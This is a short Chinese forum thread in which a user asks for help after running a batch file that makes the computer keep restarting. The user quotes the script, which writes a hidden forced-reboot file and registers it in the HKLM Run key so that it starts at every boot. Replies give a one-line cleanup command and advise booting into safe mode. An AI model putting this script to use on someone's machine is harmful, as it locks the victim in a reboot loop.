帮个忙 电脑一直重启 运行了个批处理。。
批处理吧
全部回复
仅看楼主
level 4
a36s9852 楼主
@echo off
echo @echo off>d:\b.bat
echo shutdown -r -f -t 5>>d:\b.bat
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v AUTORUN /t REG_SZ /d d:\b.bat
attrib +s +h d:\b.bat
reg add HKLM\Software\Microsoft\windows\CurrentVersi
call "d:\b.bat"
del /q %0
2014年05月24日 12点05分 1
level 4
a36s9852 楼主
怎么找到这两注册表 和那个文件 最后 弄批处理 我运行下
2014年05月24日 12点05分 2
level 1
shutdown -a && reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v AUTORUN /f && del /f /q /ash d:\b.bat
2014年05月24日 12点05分 3
第二个呢
2014年05月24日 13点05分
level 12
F 8安全模式启动 然后杀毒
2014年05月25日 00点05分 4
level 11
安全模式启动,删掉即可
2014年05月27日 16点05分 5
level 11
忘了还有注册表…
2014年05月27日 16点05分 6
1